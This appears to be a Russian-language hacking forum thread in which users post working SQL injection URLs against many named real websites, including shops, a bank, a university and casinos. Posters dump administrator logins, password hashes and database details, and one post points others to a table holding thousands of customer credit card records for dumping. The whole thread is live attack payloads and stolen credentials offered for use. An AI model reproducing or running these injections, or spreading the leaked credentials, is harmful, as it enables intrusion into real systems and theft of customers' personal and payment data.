Четвёртая ветка, шоп. http://www.worldfolkart.org/product.php?id=-2423'+union+select+1,2,3,concat_ws(0x3A3a,id,password,username,email),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39+from+users/*&cat_id=46&sub_id=312 1::flash62::wes::[email protected] Логинимся тут вроде http://www.worldfolkart.org/cart_account.php Картон ))) http://www.worldfolkart.org/product.php?id=-2423'+union+select+1,2,3,concat_ws(0x3A3a,cc_num,cc_name,cc_type),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39+from+orders/*&cat_id=46&sub_id=312 по count 4787 штук в базе, without cvv. Можете дампить, я плохими делами не занимаюсь. Удачи )))
Инъекция: Инфо: Структура: Code: categories: u_id cat_id cat_name cat_parent cat_descr comm_members_list: comm_id u_id u_status comm_name comments: comm_id comm_parent_id comm_parent_type comm_date comm_header comm_content comm_autor Инъекция: Инфо: Структуру лень раскрывать было... Инъекция: Инфо:
Code: [U][B]http://[COLOR=White]www.s7tour.ru[/COLOR]/hotel.php?country=-1+union+select+1,version()/*[/B][/U] *** SQLBruter's report [ Tuesday 18th 0f November 2008 08:55:02 PM ] *** [~] Names of tables bruteforce http://www.s7tour.ru/hotel.php?country=-1 UNION SELECT 0,0 FROM hotel/* http://www.s7tour.ru/hotel.php?country=-1 UNION SELECT 0,0 FROM news/* http://www.s7tour.ru/hotel.php?country=-1 UNION SELECT 0,0 FROM poll_user/*
http://www.s7tour.ru/hotel.php?country=-1+UNION+SELECT+1,concat_ws(0x3a,username,userpass)+FROM+poll_user/*
http://irannag hme.com/viewalbums.php?artistId=-1+UNION%20SELECT%201,concat_ws(0x3a3a,username,password),3,4,5,6,7,8,9,10+from+users-- http://mp3hunga ma.com/music/viewalbums.php?artistId=-5+UNION%20SELECT%201,concat_ws(0x3a3a,username,password,email),3,4,5,6,7,8,9,10+from+users--
https://www.keeperstop.com/pages.php?id=7+union+select+1,2,3,version(),5,6,7/* 5.0.44-log Таблица registrations
http://www.chicgemsetc.com/press_article.php?id=-21+union+select+1,2,3,4,5,version(),7,8,9-- 5.0.67-log Ювелирка вроде.
Инъекция: Code: DB Version - [B]5.0.51a-log[/B] DB User - [B]charity_charity@localhost[/B] DB Name - [B]charity_charity[/B] Таблицы: Таблица beg_users: Таблица beg_manager: Таблица beg_unwelcome: Только что-то пароли не подходят Email: Пароль:
http://www.a-shop.ru/product_info.php?products_id=-1'+union+select+concat(username,char(58),password)+from+administrators/* http://www.a-shop.ru/admin bigmike : bigdent
Ещё одна ювелирка вроде. http://www.atlasjewellery.com/enquiry.php?id=-147+union+select+1,2,3,4,5,6,version()/* 5.0.41-community-log
Красивый сайт нет слов )) http://lineage2-rmt.com/news.php?id=-25+union+select+1,concat_ws(0x3a,table_schema,table_name),3,4+from+information_schema.tables+limit+351,1-- http://lineage2-rmt.com/news.php?id=-25+union+select+1,concat(user_login,0x3a,user_pass,char(32,32),user_nicename,char(32,32),user_email),3,4+from+asandcom_wordpress.wp_users+limit+1,1-- admin:$P$BkKicvsTytFhHOXTNGhYXCg25CvccO. admin [email protected] zg:$P$BuYAHnmiu7Hx2ULVXEx1mMR8IyaSav/ zg [email protected]
Ещё один банк. http://www.vrlknowledgebank.com/reportinfo.php?id=-66+union+select+1,2,3,4,5,6,7,8,9,10,11,convert(concat_ws(0x3A3a,user,password)+using+latin1),13,14,15,16,17,18,19,20,21,22,23+from+mysql.user/*&page=3 root::297735bc666480a3::20To10
http://www.hoys.co.uk/shopping/exhibitor-view.php?id=-204+union+select+1,version(),3,4,5,6,7,8,9,10,11,12,13,14,15-- Продолжаем тему шоппинга в сети =) 5.0.51a
регионалки...пр5 и пр3 Database name: cms_uvirtual Version: 4.0.21 User name: [email protected] Database name: corporin_acg Version: 4.1.22-standard User name: corporin_impacto@localhost
1 edu, лень найденные на компе искать... на днях поболее выложу Code: http://soa.syr.edu/index.php?id=-4512+union+select+1,2,concat(user,0x3a,password,0x3a,host,0x3a,file_priv),4,5,6,7,8,9,10,11,12,13+from+mysql.user+limit+0,1-- root:*430A4383A430D0DB40E90432B769B148BB9765D2:localhost:Y
http://top.yason.com.ua Code: http://top.yason.com.ua/kom.php?id=1+union+select+1,concat(login,0x3a,password),3,4,5,6+from+yasonua_top.users--
Code: http://www.orby.es/index.php?id=-33+union+select+1,2,3,version(),5,6,7/* http://www.plataformarefineriano.es/index.php?id=-466+union+select+1,version(),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18/* http://www.bomberosdeasturias.es/index.php?id=-1+union+select+1,version(),3,4,5,6,7,8,9/* http://extremadura.cnt.es/index.php?id=-1517+union+select+1,version(),3,4,5,6,7,8,9,10,11,12,13,14,15,16/* http://www.fedemotocyl.es/index.php?id=-154+union+select+1,2,3,4,version(),6,7,8,9,10,11/* http://www.casino-online-fr.com/es/id.php?ID=-1398+union+select+1,2,version(),4,5,6,7,8,9,10,11/* http://www.7casinoonline.com/it/es/id.php?ID=-1405+union+select+1,2,version(),4,5,6,7,8,9,10,11/* http://www.grandscasinos.com/es/id.php?ID=-1513+union+select+1,2,version(),4,5,6,7,8,9,10,11/* http://www.casino-fr-bonus.com/es/id.php?ID=-1414+union+select+1,2,version(),4,5,6,7,8,9,10,11/* Code: http://www.hamo.es/cat/news.php?id=-10+union+select+1,2,3,4,concat(login,char(58),password),6,7,8,9+from+usuarios/* hamo:se73rXKXniZMM Админки не нашёл